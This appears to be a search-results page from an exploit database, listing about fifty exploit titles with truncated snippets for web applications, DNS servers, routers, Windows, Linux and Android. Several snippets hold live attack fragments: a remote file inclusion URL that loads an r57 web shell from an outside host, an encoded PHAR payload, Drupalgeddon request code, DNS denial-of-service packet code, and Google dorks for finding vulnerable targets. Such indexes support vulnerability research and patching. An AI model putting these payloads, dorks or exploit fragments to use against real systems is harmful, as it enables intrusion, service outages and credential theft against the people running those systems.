41207 matches found
phpCodeGenie 3.0.2 - BEAUT_PATH Remote File Inclusion
phpCodeGenie 3.0.2 - BEAUTPATH Remote File Inclusion / + + - - - DEVIL TEAM THE BEST POLISH TEAM - - + + + - phpCodeGenie app/common/lib/codeBeautifier/Beautifier/Core.php line 20-25: .... includeonce$BEAUTPATH."/Beautifier/HFile.php"; includeonce$BEAUTPATH."/Beautifier/Context.php"; class Core...
TSEP 0.942 - colorswitch.php Remote File Inclusion
TSEP 0.942 - colorswitch.php Remote File Inclusion Script: TSEP Comments: "registerglobals" must be enabled duh. document.this != http://www.milw0rm.com/exploits/2098 Vulnerable Files/Code: ./tsep.0942/include/colorswitch.php?tsepconfigabsPath=http://rst.void.ru/download/r57shell.txt?...
LimeSurvey 3.16 - Remote Code Execution
LimeSurvey 3.16 - Remote Code Execution !/usr/bin/python Description: LimeSurvey shell.php" -p phar -o /tmp/exploit.jpg PHAR = "\x3c\x3f\x70\x68\x70\x20\x5f\x5f\x48\x41\x4c\x54\x5f\x43\x4f\x4d\x50\x49\x4c\x45\x52\x28\x29\x3b\x20\x3f\x3e\x0d\x0a\x38"...
FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
FortiOS 5.6.3 - 5.6.7 FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure Exploit Title: FortiOS Leak file - Reading login/passwords in clear text. Google Dork: intext:"Please Login" inurl:"/remote/login" Date: 17/08/2019 Exploit Author: Carlos E. Vieira Vendor Homepage: https://www.fortinet.com/...
MidiCart PHP - Item_Show.php?Code_No SQL Injection
MidiCart PHP - ItemShow.php?CodeNo SQL Injection source: https://www.securityfocus.com/bid/13515/info MidiCart PHP is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful...
ISC BIND 9 - TKEY (PoC)
ISC BIND 9 - TKEY PoC / PoC for BIND9 TKEY assert Dos CVE-2015-5477 Usage: tkill What it does: - First sends a "version" query to see if the server is up. - Regardless of the version response, it then sends the DoS packet. - Then it waits 5 seconds for a response. If the server crashes, there wil...
Webfroot Shoutbox 2.32 - Expanded.php Directory Traversal
Webfroot Shoutbox 2.32 - Expanded.php Directory Traversal source: https://www.securityfocus.com/bid/7775/info A problem in Shoutbox may result in traversal attacks. The vulnerability exists due to insufficient sanitization of user-supplied values to the expanded.php script, and could allow the...
Drupal 7.0 7.31 - Drupalgeddon SQL Injection (PoC) (Reset Password) (2)
Drupal 7.0 7.31 - Drupalgeddon SQL Injection PoC Reset Password 2 array 'method' = 'POST', 'header' = "Content-Type: application/x-www-form-urlencoded\r\n", 'content' = $postdata ; $ctx = streamcontextcreate$params; $data = filegetcontents$url . '?q=node&destination=node', null, $ctx;...
Advanced Guestbook - addentry.php Arbitrary File Upload
Advanced Guestbook - addentry.php Arbitrary File Upload source: https://www.securityfocus.com/bid/61735/info Advanced Guestbook is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An...
Broadcom Wi-Fi Devices - KR00K Information Disclosure
Broadcom Wi-Fi Devices - KR00K Information Disclosure Kr00ker Experimetal KR00K PoC in python3 using scapy Description: This script is a simple experiment to exploit the KR00K vulnerability CVE-2019-15126, that allows to decrypt some WPA2 CCMP data in vulnerable devices. More specifically this...
PHP 5.6.2 - Shellshock Safe Mode disable_functions Bypass Command Injection
PHP 5.6.2 - Shellshock Safe Mode disablefunctions Bypass Command Injection Exploit Title: PHP 5.x Shellshock Exploit bypass disablefunctions Google Dork: none Date: 10/31/2014 Exploit Author: Ryan King Starfall Vendor Homepage: http://php.net Software Link:...
Grandstream UCM6200 Series CTI Interface - user_password SQL Injection
Grandstream UCM6200 Series CTI Interface - userpassword SQL Injection Exploit Title: Grandstream UCM6200 Series CTI Interface - 'userpassword' SQL Injection Date: 2020-03-30 Exploit Author: Jacob Baines Vendor Homepage: http://www.grandstream.com/ Software Link:...
Easy RM to MP3 Converter 2.7.3.700 - Input Local Buffer Overflow (SEH)
Easy RM to MP3 Converter 2.7.3.700 - Input Local Buffer Overflow SEH Exploit Title: Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow SEH Date: 2020-03-26 Author: Felipe Winsnes Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.e...
Microsoft Windows Remote Desktop - BlueKeep Denial of Service (Metasploit)
Microsoft Windows Remote Desktop - BlueKeep Denial of Service Metasploit Exploit Title: Bluekeep Denial of Service metasploit module Shodan Dork: port:3389 Date: 07/14/2019 Exploit Author: RAMELLA Sebastien https://github.com/mekhalleh/ Vendor Homepage: https://microsoft.com Version: all affected...
Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass
Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass CVE-2013-0640/1 Somehow, our script got on to the Russian forums :/ @w3bd3vil and @abh1sek Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/29881.tar.gz Adobe Acrobat Reader ASLR/DEP...
Libc - libc:fts_*() Local Denial of Service
Libc - libc:fts Local Denial of Service -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 libc:fts:multiple vendors, Denial-of-service Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 21.10.2008 - - Pub.: 04.03.2009 CVE: CVE-2009-0537 We are going informing all vendors, about this...
PHP-Fusion - article_id SQL Injection
PHP-Fusion - articleid SQL Injection source: https://www.securityfocus.com/bid/47128/info PHP-Fusion is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise...
Linux Kernel 3.10.0 (CentOS 7) - Denial of Service
Linux Kernel 3.10.0 CentOS 7 - Denial of Service / Exploit Title: CentOS7 Kernel Crashing by rsyslog daemon vulnerability | DOS on CentOS7 Exploit Author: Hosein Askari FarazPajohan Vendor HomePage: https://www.centos.org/ Version : 7 Tested on: Parrot OS Date: 12-2-2017 Category: Operating Syste...
ISC BIND 9 - Denial of Service
ISC BIND 9 - Denial of Service import socket import struct TARGET = '192.168.200.10', 53 QA = 1 QTSIG = 250 DNSMESSAGEHEADERLEN = 12 def buildbindnukequestion="\x06google\x03com\x00", udpsize=512: queryA = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16QA + "\x00\x01"...
Microsoft Windows - Local Privilege Escalation (MS15-051)
Microsoft Windows - Local Privilege Escalation MS15-051 Source: https://github.com/hfiref0x/CVE-2015-1701 Win32k LPE vulnerability used in APT attack Original info: https://www.fireeye.com/blog/threat-research/2015/04/probableapt28useo.html Credits R136a1 / hfiref0x Compiled EXE: x86 +...
The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include
The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include $Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use...
Mambo Component CopperminePhotoGalery - Remote File Inclusion
Mambo Component CopperminePhotoGalery - Remote File Inclusion CopperminePhotoGallery Component Found By k1tk4t Indonesia This bug allows a remote atacker to execute commands via RFI file: cpg.php bug: require $mosConfigabsolutepath."/administrator/components/comcpg/config.cpg.php"; path: add in...
PHPNuke-Clan 4.2.0 - mvcw_conver.php Remote File Inclusion
PHPNuke-Clan 4.2.0 - mvcwconver.php Remote File Inclusion '/ -.- --------------------------oOO------OOo------------------------- | PHPNuke-Clan = v4.2.0 mvcwconver.php Remote File Inclusion | | coded by DNX | ------------------------------------------------------------------ ! Discovered: DNX !...
eMerge E3 Access Controller 4.6.07 - Remote Code Execution
eMerge E3 Access Controller 4.6.07 - Remote Code Execution Exploit Title: eMerge E3 Access Controller 4.6.07 - Remote Code Execution Google Dork: NA Date: 2018-11-11 Exploit Author: LiquidWorm Vendor Homepage: http://linear-solutions.com/nscfamily/e3-series/ Software Link:...
PHP Link Directory 4.1.0 - Cross-Site Request Forgery (Add Admin)
PHP Link Directory 4.1.0 - Cross-Site Request Forgery Add Admin PHP Link Directory v4.1.0 CSRF Vulnerability Add Admin ==================================================================== .:. Author : AtT4CKxT3rR0r1ST [email protected] .:. Script : http://www.phplinkdirectory.com/ .:. Dork : "Powered b...
UBBCentral UBB.Threads 6.4.x 6.5.2 - thispath Remote File Inclusion
UBBCentral UBB.Threads 6.4.x 6.5.2 - thispath Remote File Inclusion Anomaly 1n The System presents UBB.threads = 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit:...
Comersus Backoffice 4.x5.06.0 - comersusdatabasecomersus.mdb Direct Request Database Disclosure
Comersus Backoffice 4.x5.06.0 - comersusdatabasecomersus.mdb Direct Request Database Disclosure source: https://www.securityfocus.com/bid/15251/info Comersus BackOfficePlus and BackOfficeLite are prone to multiple input validation and information disclosure vulnerabilities. The applications are...
IPS Community Suite 4.1.12.3 - PHP Code Injection
IPS Community Suite 4.1.12.3 - PHP Code Injection --------------------------------------------------------------------------- IPS Community Suite contentclass ; 39. 40. if ! classexists $class or ! inarray 'IPS\Content', classparents $class 41. 42. \IPS\Output::i-error 'nodeerror', '2S226/2', 404...
IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection
IPFire - CGI Web Interface Authenticated Bash Environment Variable Code Injection !/usr/bin/env python Exploit Title : IPFire = 2.15 core 82 Authenticated cgi Remote Command Injection ShellShock Exploit Author : Claudio Viviani Vendor Homepage : http://www.ipfire.org Software Link:...
HiSilicon DVRNVR hi3520d firmware - Remote Backdoor Account
HiSilicon DVRNVR hi3520d firmware - Remote Backdoor Account Exploit Title: HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account Dork: N/A Date: 2020-02-03 Exploit Author: Snawoot Vendor Homepage: http://www.hisilicon.com Product Link: http://www.hisilicon.com/en/Products Version: hi3520d...
Annuaire PHP - sites_inscription.php Multiple Cross-Site Scripting Vulnerabilities
Annuaire PHP - sitesinscription.php Multiple Cross-Site Scripting Vulnerabilities source: https://www.securityfocus.com/bid/51434/info Annuaire PHP is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. An attacker may leverage thes...
Exim 4.87 - 4.91 - Local Privilege Escalation
Exim 4.87 - 4.91 - Local Privilege Escalation !/bin/bash raptoreximwiz - "The Return of the WIZard" LPE exploit Copyright c 2019 Marco Ivaldi A flaw was found in Exim versions 4.87 to 4.91 inclusive. Improper validation of recipient address in delivermessage function in /src/deliver.c may lead to...
myPHPNuke Module My_eGallery 2.5.6 - basepath Remote File Inclusion
myPHPNuke Module MyeGallery 2.5.6 - basepath Remote File Inclusion =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- myPHPNuke Gallery Module basepath Remote File Include =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=...
BIND 9.x - Remote DNS Cache Poisoning (Python)
BIND 9.x - Remote DNS Cache Poisoning Python from scapy import import random Copyright C 2008 Julien Desfossez http://www.solisproject.net/ This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software...
PHPCOIN 1.2.2 - includesdb.php?$_CCFG[_PKG_PATH_DBSE] Traversal Arbitrary File Access
PHPCOIN 1.2.2 - includesdb.php?$CCFGPKGPATHDBSE Traversal Arbitrary File Access source: https://www.securityfocus.com/bid/15831/info PhpCOIN is prone to a file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker can exploi...
Jack (tR) Jax LinkLists 1.00 - jax_linklists.php Cross-Site Scripting
Jack tR Jax LinkLists 1.00 - jaxlinklists.php Cross-Site Scripting source: https://www.securityfocus.com/bid/28518/info Jax LinkLists is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrar...
Nginx (Debian Based Distros + Gentoo) - logrotate Local Privilege Escalation
Nginx Debian Based Distros + Gentoo - logrotate Local Privilege Escalation !/bin/bash Nginx Debian-based distros + Gentoo - Root Privilege Escalation PoC Exploit nginxed-root.sh ver. 1.0 CVE-2016-1247 Discovered and coded by: Dawid Golunski dawidatlegalhackers.com https://legalhackers.com Follow...
FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)
FlashFXP 4.2.0 Build 1730 - Denial of Service PoC Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service PoC Vendor Homepage: https://www.flashfxp.com/ Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/ Exploit Author: Paras Bhatia Discovery Date: 2020-03-30...
BigACE 2.7.5 - Arbitrary File Upload
BigACE 2.7.5 - Arbitrary File Upload ========================================== Bigace 2.7.5 Remote Upload file Vulnerability ========================================== InformatioN Title : Bigace 2.7.5 Remote Upload file Vulnerability Author : Net.Edit0r Vendor or Software Link :...
Coppermine Photo Gallery 1.2.2b - theme.php Remote File Inclusion
Coppermine Photo Gallery 1.2.2b - theme.php Remote File Inclusion source: https://www.securityfocus.com/bid/10253/info Coppermine Photo Gallery is reported prone to multiple input-validation vulnerabilities, some of which may lead to arbitrary command execution. These issues occur because the...
Yappa-ng 2.3.1 - admin_modules Remote File Inclusion
Yappa-ng 2.3.1 - adminmodules Remote File Inclusion ============================================================================================== yappa-ng = v2.3.1 adminmodules Remote File Inclusion Exploit...
Zen Load Balancer 3.10.1 - Remote Code Execution
Zen Load Balancer 3.10.1 - Remote Code Execution Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution Google Dork: no Date: 2020-03-28 Exploit Author: Cody Sixteen Vendor Homepage: https://code610.blogspot.com Software Link:...
Joomla! Component GMapFP 3.30 - Arbitrary File Upload
Joomla! Component GMapFP 3.30 - Arbitrary File Upload Exploit Title: Joomla! Component GMapFP 3.30 - Arbitrary File Upload Google Dork: inurl:''comgmapfp'' Date: 2020-03-25 Exploit Author: ThelastVvV Vendor Homepage:https://gmapfp.org/ Version: Version J3.30pro Tested on: Ubuntu PoC:...
Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack
Mozilla FireFox Windows 10 x64 - Full Chain Client Side Attack // Axel '0vercl0k' Souchet - November 19 2019 // EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip // 0:000 ? xul!sAutomationPrefIsSet - xul // Evaluate expression: 8572494...
PHPEasyData 1.5.4 - last_records.php?annuaire Cross-Site Scripting
PHPEasyData 1.5.4 - lastrecords.php?annuaire Cross-Site Scripting source: https://www.securityfocus.com/bid/29659/info PHPEasyData is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage the...
PHP-Nuke Module htmltonuke 2.0alpha - htmltonuke.php Remote File Inclusion
PHP-Nuke Module htmltonuke 2.0alpha - htmltonuke.php Remote File Inclusion htmltonuke 2.0alpha for postnuke & PHP-Nukehtmltonuke.php Remote File Include Vulnerabilities script :http://www.desarrollonuke.org http://up.9q9q.net/up/index.php?f=ddAvVTUSs file : /htmltonuke.php Dork :...
WeBid 0.7.3 RC9 - upldgallery.php Arbitrary File Upload
WeBid 0.7.3 RC9 - upldgallery.php Arbitrary File Upload ----------------------------------------------------------------------------------------- Author : Ahmad Pay Date : March, 25 2009 Location : Bojonegoro, Indonesia Critical : High Impact : System Access Where : From Remote...
Android - Binder Driver Use-After-Free
Android - Binder Driver Use-After-Free The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm and possibly others: There is a use-after-free of the wait member in the binderthread struct in the binder driver at /drivers/android/binder.c. ...
Netis WF2419 2.2.36123 - Remote Code Execution
Netis WF2419 2.2.36123 - Remote Code Execution Exploit Title: Netis WF2419 2.2.36123 - Remote Code Execution Exploit Author: Elias Issa Vendor Homepage: http://www.netis-systems.com Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/75 Date: 2020-02-11 Version: WF2419 V2.2.361...
Exim 4.90.1 - base64d Remote Code Execution
Exim 4.90.1 - base64d Remote Code Execution !/usr/bin/python import time import socket import struct s = None f = None def logo: print print " CVE-2018-6789 Poc Exploit" print "@straightblast ; [email protected]" print def connecthost, port: global s global f s =...